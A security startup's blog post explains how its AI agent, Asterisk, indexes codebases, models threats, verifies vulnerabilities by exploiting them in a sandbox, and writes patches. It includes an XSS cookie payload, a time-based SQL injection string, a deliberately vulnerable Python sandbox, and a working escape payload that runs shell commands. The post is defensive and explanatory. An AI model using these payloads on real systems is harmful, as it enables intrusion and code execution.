How Asterisk Works

Mufeed VH

Aug 30, 2024

Table of Contents

  • What is Asterisk?

  • The Asterisk Process

    1. Indexing

    2. Contextualization

    3. Threat Modeling

    4. Vulnerability Scanning & Analysis

    5. Exploitation & Verification

      1. MCTSr (Monte Carlo Tree Self-refine)

    6. Patching

    7. Reporting

  • Public Results

  • Try Asterisk at your company

What is Asterisk?

Asterisk is an AI Agent that finds, verifies, and patches security vulnerabilities in codebases. It can find business logic errors with context-aware scanning and generate reports with near-zero false positives.

The Asterisk Process

Asterisk uses a seven-step process to find security vulnerabilities in codebases with high accuracy. Let’s explore each step in technical detail.

1. Indexing

Asterisk starts by indexing your codebase. We wrote an algorithm that combines static indexing via tree-sitter with an LLM agent that walks your code. Together they produce a complete map of your codebase, including an accurate call stack and code graph.

Let’s demonstrate this with a fun example.

Indexing the old HackerNews codebase

The old HackerNews codebase from nine years ago is up on GitHub. It is written in Arc, a dialect of Lisp created by Paul Graham and Robert Morris.

There are no AST indexers or parsers for Arc implemented with tree-sitter. So, to create an AST for programs written in Arc, we would have to write a tree-sitter parser ourselves or hack together an FFI binding for the Arc compiler.

This isn’t ideal. We aim to support any given programming language using a language-agnostic indexer that requires zero engineering effort to write parsers to extend support.

We achieved this with an algorithm that builds the code graph incrementally as an LLM walks through the code. Our implementation isn’t limited by the LLM's context window or cost. Because any code can be structured into the same format (a variant of the tree-sitter grammar), we can split large source files into smaller chunks while still maintaining accuracy for call stack generation.

Let’s index the HackerNews codebase with Asterisk.

The above image is a part of the large GraphViz DOT representation of the HackerNews Arc codebase generated by Asterisk.

This step is crucial for everything that follows: Asterisk can recall the call stack of each function to see how user input travels through the logic. This is also how Asterisk creates payloads that bypass validations and reach the vulnerable code with high accuracy.

For example, for the function handle-request, this is what the call stack looks like:

Function handle-request

(def handle-request (s breaksrv)
  (if breaksrv
      (handle-request-1 s)
      (errsafe (handle-request-1 s))))

Incoming Functions:

  1. serve

(def serve ((o port 8080))
  (wipe quitsrv*)
  (ensure-srvdirs)
  (map [apply new-bgthread _] pending-bgthreads*)
  (w/socket s port
    (prn "ready to serve port " port)
    (flushout)
    (= currsock* s)
    (until quitsrv*
      (handle-request s breaksrv*)))
  (prn "quit server"))

  2. serve1

(def serve1 ((o port 8080))
  (w/socket s port (handle-request s t)))

Outgoing Functions:

  1. handle-request-1

(def handle-request-1 (s)
  (let (i o ip) (socket-accept s)
    (if (and (or (ignore-ips* ip) (abusive-ip ip))
             (++ (spurned* ip 0)))
        (force-close i o)
        (do (++ requests*)
            (++ (requests/ip* ip 0))
            (with (th1 nil th2 nil)
              (= th1 (thread
                       (after (handle-request-thread i o ip)
                              (close i o)
                              (kill-thread th2))))
              (= th2 (thread
                       (sleep threadlife*)
                       (unless (dead th1)
                         (prn "srv thread took too long for " ip))
                       (break-thread th1)
                       (force-close i o))))))))

This outgoing function handle-request-1 calls abusive-ip, handle-request-thread and so on.

Asterisk has the complete code graph for any given codebase. This is how it can traverse any function to show how an exploit payload travels through your code.
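To make the incoming/outgoing view concrete, here is a minimal sketch of a call graph that can answer "who calls this function?" and "how does a request get from the entry point to this function?". The `CodeGraph` class and its method names are our own illustration, not Asterisk's internal format; the edges are taken from the HackerNews snippets shown above.

```python
from collections import defaultdict, deque


class CodeGraph:
    """Directed call graph: an edge caller -> callee means 'caller calls callee'."""

    def __init__(self):
        self.outgoing = defaultdict(set)  # caller -> callees
        self.incoming = defaultdict(set)  # callee -> callers

    def add_call(self, caller, callee):
        self.outgoing[caller].add(callee)
        self.incoming[callee].add(caller)

    def path(self, source, sink):
        """Breadth-first search for one shortest call path from source to sink."""
        queue = deque([[source]])
        seen = {source}
        while queue:
            current = queue.popleft()
            if current[-1] == sink:
                return current
            for callee in sorted(self.outgoing.get(current[-1], ())):
                if callee not in seen:
                    seen.add(callee)
                    queue.append(current + [callee])
        return None  # sink is not reachable from source


graph = CodeGraph()
# Edges read off the Arc snippets above (hypothetical storage format).
graph.add_call("serve", "handle-request")
graph.add_call("serve1", "handle-request")
graph.add_call("handle-request", "handle-request-1")
graph.add_call("handle-request-1", "abusive-ip")
graph.add_call("handle-request-1", "handle-request-thread")

print(sorted(graph.incoming["handle-request"]))
print(graph.path("serve", "handle-request-thread"))
```

The same path query is what lets a scanner decide whether a suspicious function is reachable from an entry point at all.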

Example of a pain point solved:

Existing SAST / static analysis tools work like a semantic grep: they search for vulnerable code patterns. For example, such a tool would search for the string “pickle.loads()” and conclude that there is an Insecure Deserialization vulnerability, but it cannot verify whether user input ever reaches that call or whether the input is validated first. This is why SAST tools produce a lot of noise and high rates of false positives.
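The difference can be sketched with Python's standard `ast` module. The first check below flags every `pickle.loads` call, grep-style. The second flags a call only when its argument is a parameter of the enclosing function, which is a deliberately crude stand-in for real data-flow analysis and not how Asterisk does it. The sample source and function names are made up for illustration.

```python
import ast

# Hypothetical code under analysis.
SOURCE = '''
import pickle

def load_defaults():
    return pickle.loads(DEFAULTS_BLOB)

def load_session(request_body):
    return pickle.loads(request_body)
'''


def is_pickle_loads(node):
    """True for a call expression of the form pickle.loads(...)."""
    return (isinstance(node, ast.Call)
            and isinstance(node.func, ast.Attribute)
            and node.func.attr == "loads"
            and isinstance(node.func.value, ast.Name)
            and node.func.value.id == "pickle")


def pattern_hits(tree):
    """Grep-style: flag every pickle.loads call, regardless of its input."""
    return sorted(n.lineno for n in ast.walk(tree) if is_pickle_loads(n))


def parameter_hits(tree):
    """Flag only calls whose first argument is a parameter of the enclosing function."""
    hits = []
    for func in ast.walk(tree):
        if not isinstance(func, ast.FunctionDef):
            continue
        params = {a.arg for a in func.args.args}
        for node in ast.walk(func):
            if (is_pickle_loads(node) and node.args
                    and isinstance(node.args[0], ast.Name)
                    and node.args[0].id in params):
                hits.append((func.name, node.lineno))
    return hits


tree = ast.parse(SOURCE)
print(pattern_hits(tree))    # both calls are flagged
print(parameter_hits(tree))  # only the call fed by a function parameter
```

Even this toy check halves the findings; deciding whether `request_body` is actually attacker-controlled still requires the call graph from the indexing step.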

2. Contextualization

The second step is to build context on what the codebase is meant to do. During indexing, our AI agent learns the functionality of the code it parses. This memory is then used to write a detailed Specification Sheet for the codebase. With our current implementation, Asterisk can write accurate specification sheets even for codebases that have no comments or clear structure describing their functionality and limitations.

The specification sheet is then used to build a Threat Model around the codebase.

Why?

Human Security Engineers audit a codebase for security vulnerabilities by understanding what the software is meant to do. Thus, the way we analyze a “Social media” app and a “Banking app” differs greatly. We devise context-aware attack scenarios like “Can I withdraw money from my bank without affecting my balance?” for banking apps and “Can I log in as Mark Zuckerberg on Facebook?” for social media apps.

And it’s not just the industry or field that requires proper contextualization; “where” the software is supposed to run is also an important part of the equation.

Asterisk can differentiate between Web Apps, IoT firmware, Mobile Apps, etc., build context-aware threat models, and create realistic attack scenarios.

3. Threat Modeling

This is where LLMs' tendency to hallucinate becomes a breakthrough feature. With the context built around the scanned codebase, Asterisk generates various attack scenarios for the “Exploiter” agent to try. Since Asterisk has context on each function, it generates multi-chain attack scenarios with real impact.

Some examples would be:

  • This application uses the ElevenLabs API to generate text-to-speech and omits rate limiting for paid users. If an attacker becomes a paid user and then abuses this endpoint to process unlimited text-to-speech generations, the customer's ElevenLabs API bills will rack up, and the attacker will gain free and indirect access to the ElevenLabs API.

  • The endpoint /fetch-resume accepts a UUID of a user to fetch their resume document, but it does not validate whether the UUID belongs to the currently logged-in user, resulting in an IDOR (Insecure direct object references) vulnerability. Even though UUIDs are hard to brute-force, there should be proper isolation such that a user cannot fetch other users' resumes with their UUIDs.

These attack scenarios are then passed to the “Analyzer” agent, which reads the code to ensure the attack is exploitable. The “Exploiter” agent then verifies the attack by creating a PoC (proof of concept) exploit that shows how this attack can take place via a sandbox simulation.
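The /fetch-resume scenario above can be sketched in a few lines. This is a framework-free illustration with an in-memory store; the record layout, IDs, and function names are hypothetical and only show the shape of the missing ownership check.

```python
# Hypothetical in-memory store standing in for the application's database.
RESUMES = {
    "3f2b-alice": {"owner": "alice", "document": "Alice's resume"},
    "9c1d-bob": {"owner": "bob", "document": "Bob's resume"},
}


def fetch_resume_vulnerable(current_user, resume_id):
    # IDOR: the lookup never compares the record owner with current_user.
    record = RESUMES.get(resume_id)
    return record["document"] if record else None


def fetch_resume_fixed(current_user, resume_id):
    record = RESUMES.get(resume_id)
    # Treat "not found" and "not yours" identically to avoid leaking valid IDs.
    if record is None or record["owner"] != current_user:
        raise PermissionError("resume not found for this user")
    return record["document"]


# Alice requests Bob's resume by its ID.
print(fetch_resume_vulnerable("alice", "9c1d-bob"))
try:
    fetch_resume_fixed("alice", "9c1d-bob")
except PermissionError as error:
    print("blocked:", error)
```

A proof of concept for this class of bug is simply the first call: a logged-in user supplying another user's identifier and receiving their document.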

4. Vulnerability Scanning & Analysis

There are two types of security vulnerabilities: “technical vulnerabilities” and “business logic errors.” Let’s define the two before we discuss how Asterisk detects them.

Technical Vulnerabilities include SQL Injection, XSS (Cross-site Scripting), CSRF (Cross-site Request Forgery), SSRF (Server-side Request Forgery), and others.

Business Logic Errors are vulnerabilities that can result in financial loss or data loss to a company via a logic issue as minute as an “off-by-one” error. This could also be a side effect of a technical vulnerability like IDOR (Insecure direct object references).

How Asterisk finds and flags vulnerabilities

  • Static Rules: Asterisk has a large set of static rules that detail vulnerable code patterns, which are then used to semantically search if a given codebase uses them.

  • CVEs and N-days: Asterisk has knowledge of pretty much every CVE and N-day documented in open-source software (OSS). With a proprietary search algorithm for code embeddings, Asterisk can see if a given codebase is vulnerable to a similar vulnerability documented in the past, no matter how differently the logic is implemented. How this is done accurately is part of our secret sauce.

  • Threat Modeling: Asterisk comes up with realistic attack scenarios that affect your business logic and verifies them by combining exploit chains to create proof-of-concepts.

  • Supply Chain Monitoring: Asterisk keeps track of vulnerabilities in dependencies used in your codebase.

Combined with a lot of data on how vulnerabilities occur in various logic, be it email validation or rate limiting, Asterisk flags insecure implementations and comes up with an attack scenario utilizing the implemented logic to convey impact.
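As an illustration of the supply chain bullet above, the core of a dependency check is a comparison between pinned versions and the first fixed version named in an advisory. The sketch below assumes plain dotted numeric versions; the package names and advisory ID are invented placeholders, and a real feed and version scheme would be more involved.

```python
def parse_version(text):
    """Turn '2.4.1' into (2, 4, 1); assumes purely numeric dotted versions."""
    return tuple(int(part) for part in text.split("."))


# Hypothetical advisory data: package -> (first fixed version, advisory id).
ADVISORIES = {
    "examplelib": ("2.4.1", "EXAMPLE-0001"),
}


def vulnerable_dependencies(pinned):
    """Return (name, version, advisory id) for every pin older than its fix."""
    findings = []
    for name, version in sorted(pinned.items()):
        advisory = ADVISORIES.get(name)
        if advisory and parse_version(version) < parse_version(advisory[0]):
            findings.append((name, version, advisory[1]))
    return findings


print(vulnerable_dependencies({"examplelib": "2.3.9", "otherlib": "1.0.0"}))
print(vulnerable_dependencies({"examplelib": "2.10.0"}))
```

Comparing integer tuples rather than strings matters here: as strings, "2.10.0" would sort before "2.4.1" and be reported as vulnerable.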

5. Exploitation & Verification

Asterisk verifies the existence of discovered vulnerabilities by actually exploiting them against your software running in a sandbox environment. This ensures that the attack scenarios generated by Asterisk are not false positives.

You can give Asterisk access to your staging deployment to see how an attacker would exploit every finding raised by Asterisk. Asterisk can also deploy just the relevant parts of your codebase to generate PoCs inside a secure sandbox akin to a simulation, just like Code Interpreter.

Even without this step, Asterisk can generate valid PoCs and exploitation steps for a given finding since it has all the context needed (call stack, threat model, specification, etc.) to create a step-by-step exploit.

MCTSr (Monte Carlo Tree Self-refine)

The verification process for complex attacks is essentially performing a proof-of-concept exploit that demonstrates an apparent impact. The "proof" or "win function" here is inferred from the output.

For XSS attacks, this could be an alert pop-up for the payload "><script>alert(document.cookie);</script>. And for exploits that do not "show" an output, this could be another parameter like the response time. For example, a Time-based Blind SQL Injection payload such as id=1337 AND SLEEP(5); -- would result in the response time being delayed by 5 seconds.
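Both kinds of win function can be written as small predicates over an observed response. The sketch below is our own simplification: `timing_win` compares a payload's response time against a baseline, and `reflected_win` checks whether a marker comes back unescaped, which is a weaker proxy for an actual alert pop-up in a browser. The function names, tolerance, and sample timings are assumptions.

```python
import html
import statistics


def timing_win(baseline_seconds, payload_seconds, injected_delay=5.0, tolerance=0.5):
    """True when the payload response is slower than the baseline median
    by roughly the injected delay (for example SLEEP(5))."""
    baseline = statistics.median(baseline_seconds)
    return payload_seconds - baseline >= injected_delay - tolerance


def reflected_win(response_body, marker):
    """True when the marker appears in the response without being escaped."""
    return marker in response_body


# Time-based check with made-up measurements.
print(timing_win([0.21, 0.19, 0.25], payload_seconds=5.3))
print(timing_win([0.21, 0.19, 0.25], payload_seconds=0.4))

# Reflection check: raw output versus HTML-escaped output.
payload = '"><script>alert(document.cookie);</script>'
print(reflected_win(f'<input value="{payload}">', payload))
print(reflected_win(f'<input value="{html.escape(payload)}">', payload))
```

Using the median of several baseline requests makes the timing check less sensitive to a single slow response.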

Now that we have defined what the win function would look like, we can create a quasi-evaluation suite.

Asterisk's Verification/Exploitation Agent uses a variation of the MCTSr algorithm from the paper "Accessing GPT-4 level Mathematical Olympiad Solutions via Monte Carlo Tree Self-refine with LLaMa-3 8B" (arXiv:2406.07394), but instead of solving Mathematical Olympiad problems, we are solving vulnerability exploit chains.

A Simple Sandbox Escape Example

The above Monte Carlo feedback flow shows a simplified example of crafting a payload that escapes an insecure sandbox implemented in Python, leading to code execution. The custom win function here is to "pop a calc" or open the calculator app to demonstrate the code execution in hacker/Pwn2Own style.

The vulnerable Python Sandbox implementation:
import builtins
import types
import io
import sys

# Define a list of allowed built-in functions
ALLOWED_BUILTINS = [
    'abs', 'all', 'any', 'ascii', 'bin', 'bool', 'bytearray', 'bytes', 'chr',
    'dict', 'divmod', 'enumerate', 'filter', 'float', 'format', 'frozenset',
    'hash', 'hex', 'int', 'isinstance', 'getattr', 'hasattr', 'issubclass', 'iter', 'len', 'list',
    'map', 'max', 'min', 'next', 'oct', 'ord', 'pow', 'print', 'range',
    'repr', 'reversed', 'round', 'set', 'slice', 'sorted', 'str', 'sum',
    'tuple', 'type', 'zip'
]

# Create a restricted __builtins__ dictionary
safe_builtins = {name: getattr(builtins, name) for name in ALLOWED_BUILTINS}

# Add some safe modules
safe_builtins['math'] = __import__('math')

class RestrictedEnvironment:
    def __init__(self):
        self.globals = {
            '__builtins__': safe_builtins,
        }

    def execute(self, code):
        old_stdout = sys.stdout
        sys.stdout = io.StringIO()
        try:
            # Compile the code
            compiled_code = compile(code, '<string>', 'exec')

            # Check for forbidden names
            for name in compiled_code.co_names:
                if name not in self.globals['__builtins__']:
                    raise NameError(f"Use of '{name}' is not allowed in the sandbox")

            # Execute the code
            exec(compiled_code, self.globals)
            output = sys.stdout.getvalue()
            return output
        except Exception as e:
            print(f"Error: {str(e)}")
            return f"Error: {str(e)}"
        finally:
            sys.stdout = old_stdout

def run_in_sandbox(code):
    sandbox = RestrictedEnvironment()
    return sandbox.execute(code)

Final Payload:

print(getattr(getattr([c for c in getattr(getattr(getattr(str,'__class__'),'__base__'),'__subclasses__')() if hasattr(c,'eval')][0](),'eval'),'__call__')("__import__('os').system('open -a Calculator')") if [c for c in getattr(getattr(getattr(str,'__class__'),'__base__'),'__subclasses__')() if hasattr(c,'eval')] else "No eval method found")
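One reason the name check in this sandbox can be sidestepped is visible in how Python records names. `co_names` lists identifiers and attribute names that appear in the code itself, but an attribute passed to `getattr` as a string literal is just a constant. The short check below shows this on a harmless expression; the variable names are ours.

```python
# Direct attribute access: the attribute name is recorded in co_names.
direct = compile("str.__class__", "<string>", "exec")

# Access through getattr: the attribute name is only a string constant.
indirect = compile("getattr(str, '__class__')", "<string>", "exec")

print(direct.co_names)
print(indirect.co_names)
print("__class__" in indirect.co_consts)
```

Since `getattr` and `str` are both on the allow-list, the sandbox's `co_names` loop has nothing to reject in the second form, even though it reaches the same dunder attribute.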

The hardest problem we had to solve was defining the win function or instructing the agent on how that would look, which requires additional reasoning before starting the MCTSr verification. Currently, we have created a large set of evaluation rules from various proof-of-concept exploits, covering out-of-band vulnerabilities, error-based vulnerabilities, and so on.

The Monte Carlo Tree Self-refine approach demonstrates effectiveness in systematically exploring and refining payloads to exploit complex vulnerabilities. By combining MCTS's exploration capabilities with the refinement and evaluation processes, the algorithm can discover complex exploit chains that may be difficult to identify through Chain-of-Thought (CoT) reasoning or N-shot attempts alone.
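The overall loop can be sketched as a small tree search. This is a simplified illustration and not Asterisk's implementation or the paper's exact formulation: it uses plain UCT over mean rewards, and the `refine` step, which would be an LLM rewriting a payload based on feedback, is replaced by a random string mutation. The toy goal of spelling "calc" stands in for a real win function.

```python
import math
import random


class Node:
    def __init__(self, payload, parent=None):
        self.payload = payload
        self.parent = parent
        self.children = []
        self.visits = 0
        self.total_reward = 0.0

    def uct(self, c=1.4):
        # Mean reward plus an exploration bonus for rarely visited nodes.
        mean = self.total_reward / self.visits
        return mean + c * math.sqrt(math.log(self.parent.visits + 1) / self.visits)


def search(root_payload, refine, reward, iterations=200, branching=3, seed=0):
    rng = random.Random(seed)
    root = Node(root_payload)
    best = (reward(root_payload), root_payload)
    for _ in range(iterations):
        # Selection: descend by UCT until a node still has room for a child.
        node = root
        while len(node.children) >= branching:
            node = max(node.children, key=Node.uct)
        # Expansion: ask the refiner for a new candidate payload.
        child = Node(refine(node.payload, rng), parent=node)
        node.children.append(child)
        # Evaluation: score the candidate with the win function.
        score = reward(child.payload)
        best = max(best, (score, child.payload))
        if score >= 1.0:
            break  # win condition met
        # Backpropagation: update statistics from the new node up to the root.
        while child is not None:
            child.visits += 1
            child.total_reward += score
            child = child.parent
    return best


TARGET = "calc"  # toy stand-in for "the exploit worked"


def toy_reward(payload):
    """Fraction of TARGET matched as a prefix; 1.0 only for an exact match."""
    matched = 0
    for got, want in zip(payload, TARGET):
        if got != want:
            break
        matched += 1
    return matched / len(TARGET)


def toy_refine(payload, rng):
    """Random mutation standing in for an LLM self-refine step."""
    if len(payload) < len(TARGET):
        return payload + rng.choice("acl")
    return payload[:-1] + rng.choice("acl")


print(search("", toy_refine, toy_reward))
```

The partial-credit reward is what makes the search tractable: branches that already match a prefix get revisited more often than branches that score zero.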

6. Patching

After all the vulnerabilities are found, Asterisk writes a patch suggestion (fix code) for each one in the code style observed in your codebase. You can get these as .patch files, which saves remediation time by giving you robust fixes up front.

Asterisk also provides alternative fix suggestions other than the patch code provided.
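For readers unfamiliar with the format, a .patch file is a unified diff between the original and fixed source. The sketch below produces one with Python's standard `difflib`; the file name and the before/after code are hypothetical and only illustrate the output shape, not how Asterisk generates its patches.

```python
import difflib

# Hypothetical vulnerable function and its suggested fix, as lists of lines.
original = [
    "def fetch_resume(current_user, resume_id):\n",
    "    return RESUMES[resume_id]['document']\n",
]
patched = [
    "def fetch_resume(current_user, resume_id):\n",
    "    record = RESUMES[resume_id]\n",
    "    if record['owner'] != current_user:\n",
    "        raise PermissionError('forbidden')\n",
    "    return record['document']\n",
]

patch_text = "".join(difflib.unified_diff(
    original,
    patched,
    fromfile="a/resumes.py",
    tofile="b/resumes.py",
))
print(patch_text)
```

The resulting text can be saved with a .patch extension and reviewed like any other diff before it is applied.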

7. Reporting

Asterisk performs the steps above in the background; reporting is the part our users see. After indexing, scanning, and exploiting every finding, Asterisk generates a comprehensive report detailing every vulnerability discovered, delivered as a Dashboard and a report document.

Public Results

Asterisk has discovered vulnerabilities in various open-source software that we responsibly disclosed to their respective maintainers. Most of them are currently being remedied. For the ones we can publicly talk about (the ones that are patched), read about the Sandbox Escape in Hoppscotch, Stored XSS, Host Header Injection, Lack of Rate Limiting, and Improper Input Validation in Khoj.

Asterisk has discovered more open-source vulnerabilities (soon to be CVEs), which will soon be posted on this website's "Trophies" page when we can talk about them.

Try Asterisk at your company

Asterisk is in its early stages, and we are improving it every day. We are a team of security researchers and competitive CTF players who are super passionate about this problem. Our sole goal is to make Asterisk the state-of-the-art code vulnerability scanner.

We are proud to be backed by Y Combinator, which believes in our mission.

If you are interested in getting secured by Asterisk, please feel free to Book a Demo Call with us.

PS: This article omits a lot of important technical details that are proprietary or are kept as business secrets.
